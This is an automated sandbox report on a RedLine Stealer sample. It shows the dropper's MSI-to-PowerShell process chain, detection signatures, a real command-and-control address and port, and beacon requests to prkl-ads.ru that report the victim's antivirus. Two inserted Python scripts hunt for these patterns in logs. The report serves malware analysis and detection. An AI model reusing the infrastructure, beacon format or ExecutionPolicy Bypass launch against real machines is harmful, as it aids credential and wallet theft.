
Windows Analysis Report
SecuriteInfo.com.Win32.Trojan-gen.16963.11783.exe

Overview

General Information

Sample Name: SecuriteInfo.com.Win32.Trojan-gen.16963.11783.exe
Analysis ID: 1294691
MD5: 19124312cafa0b1c5524329755a5d6a2
SHA1: ccd8c01b210b26cd708a3e4cc49de45fed9abac1
SHA256: 0190e867668e9be091e3d52261b62ef9b65059565ec17168813f82e7693af2fd
Tags: exe

Detection

RedLine
Score: 52
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Compliance

Score: 33
Range: 0 - 100

Signatures

Yara detected RedLine Stealer
Yara detected MalDoc
Snort IDS alert for network traffic
Multi AV Scanner detection for submitted file
Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)
Found many strings related to Crypto-Wallets (likely being stolen)
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Crypto Currency Wallets
Bypasses PowerShell execution policy
Queries sensitive disk information (via WMI, Win32_DiskDrive, often done to detect virtual machines)
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
May sleep (evasive loops) to hinder dynamic analysis
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Uses code obfuscation techniques (call, push, ret)
Detected potential crypto function
Sample execution stops while process was sleeping (likely an evasion)
JA3 SSL client fingerprint seen in connection with other malware
Contains functionality to dynamically determine API calls
Uses insecure TLS / SSL version for HTTPS connection
Contains long sleeps (>= 3 min)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Adds / modifies Windows certificates
Drops PE files
Tries to load missing DLLs
Contains functionality to read the PEB
Uses a known web browser user agent for HTTP communication
Drops PE files to the windows directory (C:\Windows)
Binary contains a suspicious time stamp
Checks for available system drives (often done to infect USB drives)
Creates a process in suspended mode (likely to inject code)
Uses 32bit PE files
Queries the volume information (name, serial number etc) of a device
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Deletes files inside the Windows folder
Creates files inside the system directory
PE file contains sections with non-standard names
Stores large binary data to the registry
Found potential string decryption / allocating functions
Yara detected Credential Stealer
Contains functionality to call native functions
Found dropped PE file which has not been started or loaded
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Enables debug privileges
AV process strings found (often used to terminate AV products)
Sample file is different than original file name gathered from version info
Detected TCP or UDP traffic on non-standard ports
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Monitors certain registry keys / values for changes (often done to protect autostart functionality)

Classification

  • System is w10x64
  • SecuriteInfo.com.Win32.Trojan-gen.16963.11783.exe (PID: 7004 cmdline: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Trojan-gen.16963.11783.exe MD5: 19124312CAFA0B1C5524329755A5D6A2)
    • msiexec.exe (PID: 6200 cmdline: "C:\Windows\system32\msiexec.exe" /i "C:\Users\user\AppData\Roaming\Helper Company LLC\Helper 1.0.0\install\Helper.msi" AI_SETUPEXEPATH=C:\Users\user\Desktop\SecuriteInfo.com.Win32.Trojan-gen.16963.11783.exe SETUPEXEDIR=C:\Users\user\Desktop\ EXE_CMD_LINE="/exenoupdates /forcecleanup /wintime 1692671532 " MD5: 12C17B5A5C2A7B97342C362CA467E9A2)
  • msiexec.exe (PID: 7092 cmdline: C:\Windows\system32\msiexec.exe /V MD5: 4767B71A318E201188A0D0A420C8B608)
    • msiexec.exe (PID: 7140 cmdline: C:\Windows\syswow64\MsiExec.exe -Embedding 3407EF71A9E7EFAA675EDBEA938667C8 C MD5: 12C17B5A5C2A7B97342C362CA467E9A2)
    • msiexec.exe (PID: 6316 cmdline: C:\Windows\syswow64\MsiExec.exe -Embedding AADEFB259C244F0AA7BE078D54CFCDDA MD5: 12C17B5A5C2A7B97342C362CA467E9A2)
      • powershell.exe (PID: 6556 cmdline: -NoProfile -Noninteractive -ExecutionPolicy Bypass -File "C:\Users\user\AppData\Local\Temp\pss77D9.ps1" -propFile "C:\Users\user\AppData\Local\Temp\msi77C5.txt" -scriptFile "C:\Users\user\AppData\Local\Temp\scr77D6.ps1" -scriptArgsFile "C:\Users\user\AppData\Local\Temp\scr77D7.txt" -propSep " :<->: " -lineSep " <<:>> " -testPrefix "_testValue." MD5: DBA3E6449E97D4E3DF64527EF7012A10)
        • conhost.exe (PID: 6576 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
  • cleanup
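The tree above is the chain a detection engineer would want to catch: an Advanced Installer-built dropper (the C:\ReleaseAI\...\PowerShellScriptLauncher.pdb strings later in the report identify that framework) writes Helper.msi under %AppData%, and the Windows Installer service's MsiExec.exe -Embedding child launches powershell.exe with -ExecutionPolicy Bypass on a script in %Temp%. The following is an added example, not Joe Sandbox code; it runs over constructed Sysmon-style process events (pid, ppid, image, cmdline) modelled on this tree, and the rule names and severities are this example's own.

```python
"""Hunt process-creation telemetry for the MSI -> PowerShell chain in the tree above.

Added example (not Joe Sandbox code). Event shape is a constructed Sysmon-like record
(pid, ppid, image, cmdline); rule names and severities are this example's own.
"""
import re
from dataclasses import dataclass


@dataclass
class ProcEvent:
    pid: int
    ppid: int
    image: str
    cmdline: str


# Constructed sample events modelled on the report's process tree, plus one benign
# admin-run script (PID 8000) that must not be flagged.
SAMPLE_EVENTS = [
    ProcEvent(7004, 4000, r"C:\Users\user\Desktop\SecuriteInfo.com.Win32.Trojan-gen.16963.11783.exe",
              r"C:\Users\user\Desktop\SecuriteInfo.com.Win32.Trojan-gen.16963.11783.exe"),
    ProcEvent(6200, 7004, r"C:\Windows\system32\msiexec.exe",
              r'"C:\Windows\system32\msiexec.exe" /i "C:\Users\user\AppData\Roaming\Helper Company LLC\Helper 1.0.0\install\Helper.msi" AI_SETUPEXEPATH=C:\Users\user\Desktop\SecuriteInfo.com.Win32.Trojan-gen.16963.11783.exe SETUPEXEDIR=C:\Users\user\Desktop\ EXE_CMD_LINE="/exenoupdates /forcecleanup /wintime 1692671532 "'),
    # msiexec /V is started by the Windows Installer service, not by the dropper,
    # so the PowerShell child is not a descendant of PID 7004 in the tree.
    ProcEvent(7092, 700, r"C:\Windows\system32\msiexec.exe", r"C:\Windows\system32\msiexec.exe /V"),
    ProcEvent(6316, 7092, r"C:\Windows\syswow64\MsiExec.exe",
              r"C:\Windows\syswow64\MsiExec.exe -Embedding AADEFB259C244F0AA7BE078D54CFCDDA"),
    ProcEvent(6556, 6316, r"C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe",
              r'-NoProfile -Noninteractive -ExecutionPolicy Bypass -File "C:\Users\user\AppData\Local\Temp\pss77D9.ps1" -propFile "C:\Users\user\AppData\Local\Temp\msi77C5.txt" -scriptFile "C:\Users\user\AppData\Local\Temp\scr77D6.ps1" -scriptArgsFile "C:\Users\user\AppData\Local\Temp\scr77D7.txt"'),
    ProcEvent(8000, 7900, r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
              r"powershell.exe -ExecutionPolicy Bypass -File C:\Scripts\backup.ps1"),
]

EXEC_BYPASS = re.compile(r"-(?:ExecutionPolicy|ep)\s+Bypass", re.I)
TEMP_PS1 = re.compile(r'-File\s+"?[^"\s]*\\AppData\\Local\\Temp\\[^"\s]+\.ps1', re.I)
# Argument shape of Advanced Installer's PowerShellScriptLauncher custom action
# (its .pdb path appears in this report); legitimate AI-built packages use it too,
# so it is recorded as context rather than used as the trigger.
AI_LAUNCHER = re.compile(r"-propFile\s.*-scriptFile\s", re.I | re.S)
USER_WRITABLE_MSI = re.compile(r'/i\s+"?[^"]*\\AppData\\[^"]*\.msi', re.I)


def basename(image):
    return image.rsplit("\\", 1)[-1].lower()


def chain_of(pid, by_pid):
    """Image basenames from the oldest known ancestor down to pid."""
    names, seen = [], set()
    while pid in by_pid and pid not in seen:
        seen.add(pid)
        names.append(basename(by_pid[pid].image))
        pid = by_pid[pid].ppid
    return names[::-1]


def find_installer_powershell_chains(events):
    """Return one finding per event that matches either rule."""
    by_pid = {e.pid: e for e in events}
    findings = []
    for e in events:
        name = basename(e.image)
        parent = by_pid.get(e.ppid)
        pname = basename(parent.image) if parent else ""
        # Rule 1: an MSI installed from a user-writable profile directory.
        if name == "msiexec.exe" and USER_WRITABLE_MSI.search(e.cmdline):
            findings.append({"pid": e.pid, "rule": "msi_from_user_writable_dir",
                             "severity": "medium", "chain": chain_of(e.pid, by_pid)})
        # Rule 2: msiexec spawning PowerShell with the execution policy bypassed;
        # a script in %Temp% raises the severity.
        if name == "powershell.exe" and pname == "msiexec.exe" and EXEC_BYPASS.search(e.cmdline):
            findings.append({"pid": e.pid, "rule": "msiexec_spawns_powershell_bypass",
                             "severity": "high" if TEMP_PS1.search(e.cmdline) else "medium",
                             "ai_launcher": bool(AI_LAUNCHER.search(e.cmdline)),
                             "chain": chain_of(e.pid, by_pid)})
    return findings


if __name__ == "__main__":
    for f in find_installer_powershell_chains(SAMPLE_EVENTS):
        print(f["severity"], f["rule"], " -> ".join(f["chain"]))
```

Because the Windows Installer service re-parents the custom action, the PowerShell process's ancestry is msiexec.exe -> MsiExec.exe -> powershell.exe with no link back to the dropper; tying PID 6556 to PID 7004 requires correlating on the MSI path or on the installer's own event log entries, which this example does not attempt.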
Name: RedLine Stealer
Description: RedLine Stealer is a malware available on underground forums for sale apparently as standalone ($100/$150 depending on the version) or also on a subscription basis ($100/month). This malware harvests information from browsers such as saved credentials, autocomplete data, and credit card information. A system inventory is also taken when running on a target machine, to include details such as the username, location data, hardware configuration, and information regarding installed security software. More recent versions of RedLine added the ability to steal cryptocurrency. FTP and IM clients are also apparently targeted by this family, and this malware has the ability to upload and download files, execute commands, and periodically send back information about the infected computer.
Attribution: No Attribution
Blogpost URLs: (none listed)
Link: https://malpedia.caad.fkie.fraunhofer.de/details/win.redline_stealer
No configs have been found
Yara matches (PCAP):
Source: dump.pcap | Rule: JoeSecurity_RedLine | Description: Yara detected RedLine Stealer | Author: Joe Security
Source: dump.pcap | Rule: JoeSecurity_RedLine_1 | Description: Yara detected RedLine Stealer | Author: Joe Security

Yara matches (dropped files):
Source: C:\Users\user\AppData\Roaming\Helper Company LLC\Helper 1.0.0\install\Helper.msi | Rule: JoeSecurity_MalDoc | Description: Yara detected MalDoc | Author: Joe Security
Source: C:\Windows\Installer\446fc6.msi | Rule: JoeSecurity_MalDoc | Description: Yara detected MalDoc | Author: Joe Security

Yara matches (memory dumps):
Source: 00000005.00000002.523653859.0000000004FD2000.00000004.00000800.00020000.00000000.sdmp | Rule: JoeSecurity_RedLine | Description: Yara detected RedLine Stealer | Author: Joe Security
Source: 00000005.00000002.523653859.0000000004FD2000.00000004.00000800.00020000.00000000.sdmp | Rule: JoeSecurity_CredentialStealer | Description: Yara detected Credential Stealer | Author: Joe Security
Source: Process Memory Space: powershell.exe PID: 6556 | Rule: JoeSecurity_RedLine | Description: Yara detected RedLine Stealer | Author: Joe Security
Source: Process Memory Space: powershell.exe PID: 6556 | Rule: JoeSecurity_CredentialStealer | Description: Yara detected Credential Stealer | Author: Joe Security
                  No Sigma rule has matched
Snort IDS alerts:
Timestamp: 08/21/23-19:35:51.013900 | SID: 2046105 | Source: 192.168.2.3:49736 -> Destination: 45.135.232.24:9878 | Protocol: TCP | Classtype: A Network Trojan was detected
Timestamp: 08/21/23-19:35:51.481894 | SID: 2046045 | Source: 192.168.2.3:49737 -> Destination: 45.135.232.24:9878 | Protocol: TCP | Classtype: A Network Trojan was detected
Timestamp: 08/21/23-19:35:54.924171 | SID: 2046056 | Source: 45.135.232.24:9878 -> Destination: 192.168.2.3:49737 | Protocol: TCP | Classtype: A Network Trojan was detected
Timestamp: 08/21/23-19:35:51.013900 | SID: 2046045 | Source: 192.168.2.3:49736 -> Destination: 45.135.232.24:9878 | Protocol: TCP | Classtype: A Network Trojan was detected
Timestamp: 08/21/23-19:35:54.854691 | SID: 2046105 | Source: 192.168.2.3:49737 -> Destination: 45.135.232.24:9878 | Protocol: TCP | Classtype: A Network Trojan was detected


                  AV Detection

Source: SecuriteInfo.com.Win32.Trojan-gen.16963.11783.exe | ReversingLabs: Detection: 13%
Source: SecuriteInfo.com.Win32.Trojan-gen.16963.11783.exe | Virustotal: Detection: 11%

                  Compliance

Source: unknown | HTTPS traffic detected: 81.177.140.69:443 -> 192.168.2.3:49723 version: TLS 1.0
Source: SecuriteInfo.com.Win32.Trojan-gen.16963.11783.exe | Static PE information: EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
Source: unknown | HTTPS traffic detected: 81.177.140.69:443 -> 192.168.2.3:49724 version: TLS 1.2
Source: SecuriteInfo.com.Win32.Trojan-gen.16963.11783.exe | Static PE information: certificate valid
Source: SecuriteInfo.com.Win32.Trojan-gen.16963.11783.exe | Static PE information: DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
Source: Binary string: wininet.pdb | source: SecuriteInfo.com.Win32.Trojan-gen.16963.11783.exe, 00000000.00000003.392305462.0000000005953000.00000004.00000020.00020000.00000000.sdmp, shi69FA.tmp.0.dr
Source: Binary string: C:\ReleaseAI\win\Release\custact\x86\PowerShellScriptLauncher.pdb | source: SecuriteInfo.com.Win32.Trojan-gen.16963.11783.exe, 446fc6.msi.1.dr, Helper.msi.0.dr
Source: Binary string: C:\ReleaseAI\win\Release\custact\x86\Prereq.pdb| | source: SecuriteInfo.com.Win32.Trojan-gen.16963.11783.exe, 446fc6.msi.1.dr, Helper.msi.0.dr, MSI750A.tmp.1.dr
Source: Binary string: C:\ReleaseAI\win\Release\custact\x86\Prereq.pdb | source: SecuriteInfo.com.Win32.Trojan-gen.16963.11783.exe, 446fc6.msi.1.dr, Helper.msi.0.dr, MSI750A.tmp.1.dr
Source: Binary string: wininet.pdbUGP | source: SecuriteInfo.com.Win32.Trojan-gen.16963.11783.exe, 00000000.00000003.392305462.0000000005953000.00000004.00000020.00020000.00000000.sdmp, shi69FA.tmp.0.dr
Source: Binary string: System.ServiceModel.pdb | source: powershell.exe, 00000005.00000002.521530251.0000000000937000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: C:\ReleaseAI\win\Release\custact\x86\lzmaextractor.pdb | source: SecuriteInfo.com.Win32.Trojan-gen.16963.11783.exe, 446fc6.msi.1.dr, Helper.msi.0.dr
Source: Binary string: C:\ReleaseAI\win\Release\custact\x86\AICustAct.pdb | source: SecuriteInfo.com.Win32.Trojan-gen.16963.11783.exe, 446fc6.msi.1.dr, Helper.msi.0.dr, MSI74BB.tmp.1.dr, MSI7331.tmp.1.dr, MSI6AF5.tmp.0.dr
Source: Binary string: C:\ReleaseAI\win\Release\custact\x86\PowerShellScriptLauncher.pdb_ | source: SecuriteInfo.com.Win32.Trojan-gen.16963.11783.exe, 446fc6.msi.1.dr, Helper.msi.0.dr
Source: Binary string: C:\ReleaseAI\win\Release\stubs\x86\ExternalUi.pdb | source: SecuriteInfo.com.Win32.Trojan-gen.16963.11783.exe

Source: C:\Windows\SysWOW64\msiexec.exe | File opened: a:, b:, e:, f:, g:, h:, i:, j:, k:, l:, m:, n:, o:, p:, q:, r:, s:, t:, u:, v:, w:, x:, y:, z:
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | File opened: c:

Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Trojan-gen.16963.11783.exe | Code function: 0_2_00CF27F0 ReadFile,FindFirstFileW,FindClose,CreateEventW,CreateThread,WaitForSingleObject,GetExitCodeThread,CloseHandle,CloseHandle,CloseHandle,CloseHandle,CloseHandle,CloseHandle,CloseHandle,0_2_00CF27F0
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Trojan-gen.16963.11783.exe | Code function: 0_2_00CCC9A0 FindFirstFileW,GetLastError,FindClose,0_2_00CCC9A0
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Trojan-gen.16963.11783.exe | Code function: 0_2_00CF3E10 FindFirstFileW,FindClose,CloseHandle,CloseHandle,CreateFileW,SetFilePointer,SetEndOfFile,FindCloseChangeNotification,DeleteFileW,DeleteFileW,DeleteFileW,CloseHandle,0_2_00CF3E10
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Trojan-gen.16963.11783.exe | Code function: 0_2_00CCC040 _wcsrchr,FindFirstFileW,FindFirstFileW,FindFirstFileW,FindClose,FindClose,0_2_00CCC040
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Trojan-gen.16963.11783.exe | Code function: 0_2_00CCE270 FindFirstFileW,FindClose,0_2_00CCE270
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Trojan-gen.16963.11783.exe | Code function: 0_2_00CCC3D0 FindFirstFileW,GetFileAttributesW,SetFileAttributesW,GetFileAttributesW,FindNextFileW,0_2_00CCC3D0
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Trojan-gen.16963.11783.exe | Code function: 0_2_00D108C0 FindFirstFileW,FindNextFileW,FindFirstFileW,FindNextFileW,FindNextFileW,FindClose,0_2_00D108C0
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Trojan-gen.16963.11783.exe | Code function: 0_2_00CDAB40 FindFirstFileW,FindClose,FindClose,0_2_00CDAB40
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Trojan-gen.16963.11783.exe | Code function: 0_2_00CFCDD0 FindFirstFileW,FindNextFileW,FindNextFileW,FindClose,0_2_00CFCDD0
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Trojan-gen.16963.11783.exe | Code function: 0_2_00BD11B0 FindClose,PathIsUNCW,FindFirstFileW,GetFullPathNameW,GetFullPathNameW,FindClose,SetLastError,_wcsrchr,_wcsrchr,PathIsUNCW,0_2_00BD11B0
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Trojan-gen.16963.11783.exe | Code function: 0_2_00CFD1D0 FindFirstFileW,FindClose,0_2_00CFD1D0
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Trojan-gen.16963.11783.exe | Code function: 0_2_00CB1410 FindFirstFileW,FindNextFileW,FindClose,0_2_00CB1410

                  Networking

Source: Yara match | File source: C:\Users\user\AppData\Roaming\Helper Company LLC\Helper 1.0.0\install\Helper.msi, type: DROPPED
Source: Yara match | File source: C:\Windows\Installer\446fc6.msi, type: DROPPED
Source: Traffic | Snort IDS: 2046045 ET TROJAN [ANY.RUN] RedLine Stealer Related (MC-NMF Authorization) 192.168.2.3:49736 -> 45.135.232.24:9878
Source: Traffic | Snort IDS: 2046105 ET TROJAN Redline Stealer TCP CnC Activity - MSValue (Outbound) 192.168.2.3:49736 -> 45.135.232.24:9878
Source: Traffic | Snort IDS: 2046045 ET TROJAN [ANY.RUN] RedLine Stealer Related (MC-NMF Authorization) 192.168.2.3:49737 -> 45.135.232.24:9878
Source: Traffic | Snort IDS: 2046105 ET TROJAN Redline Stealer TCP CnC Activity - MSValue (Outbound) 192.168.2.3:49737 -> 45.135.232.24:9878
Source: Traffic | Snort IDS: 2046056 ET TROJAN Redline Stealer Activity (Response) 45.135.232.24:9878 -> 192.168.2.3:49737
Source: Joe Sandbox View | JA3 fingerprint: 54328bd36c14bd82ddaa0c04b25ed9ad
Source: unknown | HTTPS traffic detected: 81.177.140.69:443 -> 192.168.2.3:49723 version: TLS 1.0
Source: global traffic | HTTP traffic detected: GET /?status=reg&key=llks74638sj&site=Test HTTP/1.1 | User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.17134.1 | Host: prkl-ads.ru | Connection: Keep-Alive
Source: global traffic | HTTP traffic detected: GET /?status=start&av=Windows%20Defender HTTP/1.1 | User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.17134.1 | Host: prkl-ads.ru
Source: global traffic | HTTP traffic detected: GET /?status=install HTTP/1.1 | User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.17134.1 | Host: prkl-ads.ru
Source: global traffic | TCP traffic: 192.168.2.3:49735 -> 45.135.232.24:9878
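The three GET requests above are the installer script's check-ins, not the RedLine C2 itself: a PowerShell User-Agent, a bare query string that walks through status=reg (with a campaign key and site name), status=start (reporting the installed AV product, here Windows Defender) and status=install, all to one host. The PowerShell User-Agent alone is noisy in any estate where admins run Invoke-WebRequest, so the sequence is what makes a good hunt. The following is an added example, not Joe Sandbox code; the proxy log format is constructed (timestamp, client, method, host, request-target, quoted User-Agent) and the sample lines are modelled on the three requests in this report plus two benign ones.

```python
"""Hunt proxy logs for the PowerShell-driven installer beacons seen above.

Added example (not Joe Sandbox code). The log line format below is constructed
(timestamp, client, method, host, request-target, quoted user-agent); the sample
lines are modelled on the three GET requests in the report, plus two benign ones.
"""
import re
from collections import defaultdict
from urllib.parse import parse_qs, urlsplit

SAMPLE_LOG = """\
2023-08-21T19:35:40Z 192.168.2.3 GET prkl-ads.ru /?status=reg&key=llks74638sj&site=Test "Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.17134.1"
2023-08-21T19:35:42Z 192.168.2.3 GET prkl-ads.ru /?status=start&av=Windows%20Defender "Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.17134.1"
2023-08-21T19:35:49Z 192.168.2.3 GET prkl-ads.ru /?status=install "Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.17134.1"
2023-08-21T19:36:01Z 192.168.2.7 GET intranet.example.local /api/inventory "Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1"
2023-08-21T19:36:05Z 192.168.2.9 GET www.example.com /?status=reg "Mozilla/5.0 (Windows NT 10.0; Win64; x64) Chrome/115.0"
"""

LINE_RE = re.compile(
    r'^(?P<ts>\S+) (?P<client>\S+) (?P<method>\S+) (?P<host>\S+) (?P<target>\S+) "(?P<ua>[^"]*)"$')
# Default User-Agent of Invoke-WebRequest / Invoke-RestMethod on Windows PowerShell 5.x.
PS_UA_RE = re.compile(r"\bWindowsPowerShell/\d")
# The three check-in phases observed in the report.
BEACON_STATUSES = {"reg", "start", "install"}


def parse_line(line):
    """Split one constructed log line; returns None for lines that do not fit the format."""
    m = LINE_RE.match(line.strip())
    if not m:
        return None
    rec = m.groupdict()
    # parse_qs URL-decodes values, so av=Windows%20Defender becomes "Windows Defender".
    rec["query"] = {k: v[0] for k, v in parse_qs(urlsplit(rec["target"]).query).items()}
    return rec


def find_installer_beacons(log_text):
    """Group PowerShell-UA requests that carry a status= parameter by (client, host)."""
    sessions = defaultdict(lambda: {"statuses": [], "av": None, "key": None})
    for line in log_text.splitlines():
        rec = parse_line(line)
        if rec is None or not PS_UA_RE.search(rec["ua"]):
            continue
        status = rec["query"].get("status")
        if status is None:
            continue
        s = sessions[(rec["client"], rec["host"])]
        s["statuses"].append(status)
        s["av"] = rec["query"].get("av", s["av"])
        s["key"] = rec["query"].get("key", s["key"])
    return dict(sessions)


def score(session):
    """'high' once reg, start and install have all been seen from one client to one host."""
    return "high" if BEACON_STATUSES <= set(session["statuses"]) else "medium"


if __name__ == "__main__":
    for (client, host), s in find_installer_beacons(SAMPLE_LOG).items():
        print(score(s), client, "->", host, s["statuses"], "av:", s["av"], "key:", s["key"])
```

The raw TCP session to 45.135.232.24:9878 that the Snort signatures attribute to RedLine is a separate signal on a non-standard port and is not covered by this HTTP hunt; in a real proxy log the key= and av= values are worth keeping, since the key identifies the campaign and the av value tells you which security product the loader saw on the host.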
Source: SecuriteInfo.com.Win32.Trojan-gen.16963.11783.exe, 00000000.00000003.392305462.0000000005953000.00000004.00000020.00020000.00000000.sdmp, shi69FA.tmp.0.dr | String found in binary or memory: http://.css
Source: SecuriteInfo.com.Win32.Trojan-gen.16963.11783.exe, 00000000.00000003.392305462.0000000005953000.00000004.00000020.00020000.00000000.sdmp, shi69FA.tmp.0.dr | String found in binary or memory: http://.jpg
Source: SecuriteInfo.com.Win32.Trojan-gen.16963.11783.exe, 00000000.00000002.565831914.0000000001486000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.Trojan-gen.16963.11783.exe, 00000000.00000003.562864439.0000000001486000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://cacerts.digicert.com/
Source: SecuriteInfo.com.Win32.Trojan-gen.16963.11783.exe, 00000000.00000003.562864439.0000000001486000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRootCA.
Source: SecuriteInfo.com.Win32.Trojan-gen.16963.11783.exe, 446fc6.msi.1.dr, Helper.msi.0.dr, MSI750A.tmp.1.dr, MSI74BB.tmp.1.dr, MSI7331.tmp.1.dr, MSI6AF5.tmp.0.dr | String found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0E
Source: SecuriteInfo.com.Win32.Trojan-gen.16963.11783.exe, 00000000.00000002.565831914.0000000001486000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.Trojan-gen.16963.11783.exe, 00000000.00000003.562864439.0000000001486000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStam$0K
Source: SecuriteInfo.com.Win32.Trojan-gen.16963.11783.exe, 446fc6.msi.1.dr, Helper.msi.0.dr, MSI750A.tmp.1.dr, MSI74BB.tmp.1.dr, MSI7331.tmp.1.dr, MSI6AF5.tmp.0.dr | String found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crt0
Source: SecuriteInfo.com.Win32.Trojan-gen.16963.11783.exe, 446fc6.msi.1.dr, Helper.msi.0.dr, MSI750A.tmp.1.dr, MSI74BB.tmp.1.dr, MSI7331.tmp.1.dr, MSI6AF5.tmp.0.dr | String found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedRootG4.crt0C
Source: SecuriteInfo.com.Win32.Trojan-gen.16963.11783.exe, 446fc6.msi.1.dr, Helper.msi.0.dr, MSI76B1.tmp.1.dr | String found in binary or memory: http://cert.ssl.com/SSLcom-SubCA-CodeSigning-RSA-4096-R1.cer0Q
Source: SecuriteInfo.com.Win32.Trojan-gen.16963.11783.exe, 00000000.00000002.565831914.0000000001486000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.Trojan-gen.16963.11783.exe, 00000000.00000003.562864439.0000000001486000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000005.00000003.406238979.00000000009AB000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000005.00000003.403706789.00000000009A8000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000005.00000003.401802192.00000000009A0000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.521530251.00000000009A7000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000005.00000003.401219466.0000000000995000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://crl.globalsign.net/root-r2.crl0
Source: powershell.exe, 00000005.00000003.406446885.0000000007144000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://crl.microsof
Source: SecuriteInfo.com.Win32.Trojan-gen.16963.11783.exe, 446fc6.msi.1.dr, Helper.msi.0.dr, MSI750A.tmp.1.dr, MSI74BB.tmp.1.dr, MSI7331.tmp.1.dr, MSI6AF5.tmp.0.dr | String found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0
Source: SecuriteInfo.com.Win32.Trojan-gen.16963.11783.exe, 00000000.00000002.565831914.0000000001486000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.Trojan-gen.16963.11783.exe, 00000000.00000003.562864439.0000000001486000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://crl3.digicert.com/DigiCertTrusted
Source: SecuriteInfo.com.Win32.Trojan-gen.16963.11783.exe, 00000000.00000002.565831914.0000000001486000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.Trojan-gen.16963.11783.exe, 00000000.00000003.562864439.0000000001486000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://crl3.digicert.com/DigiCertTrustedG4
Source: SecuriteInfo.com.Win32.Trojan-gen.16963.11783.exe, 446fc6.msi.1.dr, Helper.msi.0.dr, MSI750A.tmp.1.dr, MSI74BB.tmp.1.dr, MSI7331.tmp.1.dr, MSI6AF5.tmp.0.dr | String found in binary or memory: http://crl3.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crl0
Source: SecuriteInfo.com.Win32.Trojan-gen.16963.11783.exe, 446fc6.msi.1.dr, Helper.msi.0.dr, MSI750A.tmp.1.dr, MSI74BB.tmp.1.dr, MSI7331.tmp.1.dr, MSI6AF5.tmp.0.dr | String found in binary or memory: http://crl3.digicert.com/DigiCertTrustedRootG4.crl0
Source: SecuriteInfo.com.Win32.Trojan-gen.16963.11783.exe, 446fc6.msi.1.dr, Helper.msi.0.dr | String found in binary or memory: http://crls.ssl.co
Source: SecuriteInfo.com.Win32.Trojan-gen.16963.11783.exe, 446fc6.msi.1.dr, Helper.msi.0.dr, MSI76B1.tmp.1.dr | String found in binary or memory: http://crls.ssl.com/SSLcom-SubCA-CodeSigning-RSA-4096-R1.crl0
Source: SecuriteInfo.com.Win32.Trojan-gen.16963.11783.exe, 446fc6.msi.1.dr, Helper.msi.0.dr | String found in binary or memory: http://crls.ssl.com/ssl.com-rsa-RootCA.crl0
Source: powershell.exe, 00000005.00000002.523653859.0000000004FD2000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-soap-message-security-1.0#Base64Binary
